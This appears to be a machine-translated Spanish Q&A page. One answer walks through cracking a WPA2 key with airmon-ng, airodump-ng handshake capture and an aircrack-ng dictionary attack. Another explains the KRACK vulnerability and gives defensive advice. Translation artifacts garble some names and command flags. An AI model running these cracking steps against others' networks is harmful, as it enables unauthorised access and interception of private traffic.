¿Cómo se rompe una red inalámbrica WPA2?

A diferencia de WEP, el único enfoque viable para descifrar una clave WPA2 es un ataque de fuerza bruta. Si bien hay otras herramientas, aircrack-ng (en combinación con airodump-ng; backtrack5 es una colección ordenada de estas empaquetadas en una máquina virtual que puede usar con una prueba de VMware o similar) es la más popular.

Hipotéticamente, si intentara descifrar una red WPA2, necesitaría una tarjeta inalámbrica que admita la inyección de paquetes. Un favorito de la multitud parece ser el Afla AWUS036H que contiene un chipset Realtek RTL8187L y se puede obtener por alrededor de $ 30 en Amazon. En cuanto al proceso real …

• Usando BT, Kismac / Kismet o similares, comenzaría obteniendo información básica sobre la red que desea descifrar, como el BSSID y el canal.

• Luego, ponga su tarjeta en modo monitor en el canal utilizado por el AP. Suponiendo que está utilizando la tarjeta mencionada anteriormente junto con BT, abra una ventana de consola y escriba:
airmon-ng start wlan0 11
** 11 es el número de canal que estoy usando

• Comience a recopilar apretones de manos (cuando el cliente se conecta a la red). Abra otra ventana de consola en BT y escriba:
airodump-ng -c 11 –bssid 00: 23: 69: D7: 25: FE -w savethis wlan0
** -c 11 = estamos diciendo que queremos centrarnos en el canal 11
** –bssid 00: 23: 69: D7: 25: FE = con este BSSID específico
** -w savethis = “-w” guarda la información en un archivo con el nombre que elijas, yo usé “savethis”
** wlan0 = el inferface utilizado

Como nota al margen: no es necesario, pero si no es paciente, haga una búsqueda en Google sobre cómo eliminar la autenticación del cliente para obtener un apretón de manos un poco más rápido.

• Una vez más, suponiendo que esté utilizando BT, una vez que haya capturado un apretón de manos, aparecerá en la esquina superior derecha de la ventana (dice algo como “Apretón de manos WPA 00: 23: 69: D7: 25: FE “). Ahora puede descifrar la clave previamente compartida utilizando un diccionario de posibles contraseñas.

Abra otra ventana de consola y escriba:
aircrack-ng -w passwordlist.lst -b 00: 23: 69: D7: 25: FE savethis.cap
** -w passwordlist.lst = “passwordlist.lst” es el nombre del diccionario
** savethis.cap = el archivo con los paquetes capturados que guardamos anteriormente

No se garantiza que este proceso funcione. Para que sea efectivo, su contraseña debe figurar en su diccionario y, dependiendo del tamaño del diccionario, esto puede llevar de 5 minutos a varias horas. Básicamente, la respuesta anterior es cierta, excepto que quería mostrar que no necesita nada especial aparte de una tarjeta inalámbrica de $ 30.

Tenga en cuenta que esto es solo por diversión; No lo use con fines nefastos. Además, si desea disuadir al niño geek del otro lado de la calle de usar su red para descargar porno peludo, asegúrese de estar usando WPA2 y tener una contraseña segura como un 63 caracteres de caracteres aleatorios que consisten en letras, números y símbolos.

Muchos de nosotros nos sorprendimos esta semana al descubrir que existe una vulnerabilidad tanto en WPA2-PSK como en 802.1x EAP que permite un ataque de hombre en el medio. No es mi práctica explicar a otros cómo piratear la red de alguien. Sin embargo, felizmente advertiré a cualquiera sobre las cosas de las que necesitan protegerse y cómo protegerse. Honestamente, estoy bastante asqueado por la cantidad de A2A que obtengo sobre cómo piratear la red privada / teléfono / información / lo que sea de alguien. No voy a responder ninguno de esos, nunca.

El Ataque de reasignación de teclas, o KRACK, es un método para entrar en una conexión WiFi que anteriormente la mayoría creía invulnerable (incluido yo). Es importante tener en cuenta que el cifrado AES no se ha roto, pero este método elimina la necesidad de romperlo. En cambio, se coloca un dispositivo entre su dispositivo WiFi y el Punto de acceso y aprovecha una vulnerabilidad durante el proceso de negociación de su seguridad para engañar a ambos extremos de que todo es kosher mientras observa todo lo que hace, para incluir qué inicio de sesión y contraseñas ingresa.

Hay buenas y malas noticias, pero primero permítanme enfatizar que este truco resalta una vulnerabilidad que se conoce desde hace un tiempo. TKIP es un método de seguridad inalámbrica que ya se consideraba lo suficientemente cuestionable como para que fuera eliminado del estándar de Wi-Fi en marzo de 2015. Con este truco es aún más un riesgo de seguridad. NO USE TKIP. No deberías haberlo usado antes; definitivamente no lo uses ahora. Mientras estoy en eso, NO USE WEP. Déjame repetir. NO UTILICE WEP. WEP es muy sencillo de descifrar. Con este truco y TKIP, un pirata informático no solo puede ver lo que hace, sino también inyectar su propia información, posiblemente robando a ciegas mientras simplemente mira el saldo de su cuenta bancaria. NO USE TKIP.

Ahora, de vuelta a la nueva vulnerabilidad. Con un ataque Man-in-the-middle alguien necesitaría ser local. No pueden hacer esto de forma remota. Al menos, deben tener equipos locales para su red WiFi. No te preocupes si alguien de China o Rusia entra en tu red WiFi con este truco si vives en Argentina, Dakota del Norte o en otro lugar que no sea local para esos piratas informáticos. Vivo en el campo y dudo seriamente, en mi casa, tengo que preocuparme. Aún así, hay cosas que puede y debe hacer para protegerse.

  1. No confíe en ningún sitio web que no use HTTPS. Lo verás en tu navegador. Si intenta conectarse a http://www.somecompany.com y el sitio web aparece como http://www.somecompany.com , no lo use. Si aparece como https://www.somecompany.com y sabe que esta es la URL correcta, es probable que esté bien. http no es seguro. Busque el icono del candado en su navegador, esto indicará https. Incluso si eres hackeado con un hombre en el medio, esto irá lejos para protegerte.
  2. Cuando reciba una notificación de actualización de Apple, Windows, Verizon (o el proveedor de su elección), acepte la actualización, pero asegúrese de que esté en proceso de actualización. Esto sucederá pronto y será una solución a esta vulnerabilidad. Sé que todas esas actualizaciones pueden ser un dolor, pero vale la pena.
  3. Tanto Linux como Android están en mayor riesgo debido a la forma en que procesan el protocolo de enlace de 4 vías de seguridad WPA2. Actualice sus controladores cuando haya una solución para Linus. Actualice su Android cuando haya una solución para ello. En realidad, esto es bastante inusual ya que Linux tiende a ser mucho más inherentemente seguro.
  4. Los puntos de acceso en sí mismos generalmente no están en riesgo. Sin embargo, un parche en el AP debería poder proteger a cualquier persona conectada a él de este hack. Si usa WDS para conectar más de un AP, o alguna otra forma de malla (como lo hacen los AP de Google), su AP es susceptible hasta que apliquen su código. Si usa un AP que le permite convertirlo en un dispositivo cliente (como Ubiquiti, MikroTik o cualquier AP basado en Linux), su AP es susceptible en ese modo hasta que haya un parche disponible y lo cargue.
  5. También puede usar una VPN entre su dispositivo (teléfono / computadora portátil / PC y el sitio al que está accediendo). Esto cifrará su información más allá de lo que hace WPA2, eliminando el peligro de KRACK.

Todavía no lo he visto, pero sospecho que una versión de este método también podría usarse para un escenario de miel. (no, no explicaré qué es eso) Por esta razón, no confíe únicamente en un parche para su AP. Asegúrese de proteger los dispositivos de sus clientes actualizándolos también.